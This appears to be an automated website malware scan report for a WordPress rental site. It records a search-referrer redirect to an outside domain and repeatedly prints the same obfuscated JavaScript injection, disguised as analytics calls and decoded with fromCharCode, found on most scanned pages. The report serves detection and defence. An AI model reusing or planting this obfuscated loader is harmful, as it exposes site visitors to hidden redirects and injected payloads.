Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://cedargablerentals.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: cedargablerentals.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 08 Sep 2014 15:59:27 GMT Location: http://fpert.qpoe.com/ Server: Apache Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
| Request | Server response | Status |
http://cedargablerentals.com/ | 200 OK Content-Length: 12215 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/wp-content/themes/dream_vacation_home_hoe113/script.js | 200 OK Content-Length: 6575 Content-Type: application/javascript | clean |
http://cedargablerentals.com/?page_id=11 | 200 OK Content-Length: 9593 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?page_id=9 | 200 OK Content-Length: 9621 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?page_id=2 | 200 OK Content-Length: 9714 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?p=19 | 200 OK Content-Length: 12526 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?p=1 | 200 OK Content-Length: 12329 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?cat=1 | 200 OK Content-Length: 12681 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?feed=rss2 | 200 OK Content-Length: 2952 Content-Type: text/xml | clean |
http://cedargablerentals.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 08 Sep 2014 15:59:34 GMT Location: http://cedargablerentals.com/test404page.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://cedargablerentals.com/xmlrpc.php | clean |
http://cedargablerentals.com/test404page.js/ | 200 OK Content-Length: 12215 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/wp-login.php | 200 OK Content-Length: 3541 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 3184 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cedargablerentals.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cedargablerentals.com/
Result: cedargablerentals.com is not infected or malware details are not published yet.
Result: cedargablerentals.com is not infected or malware details are not published yet.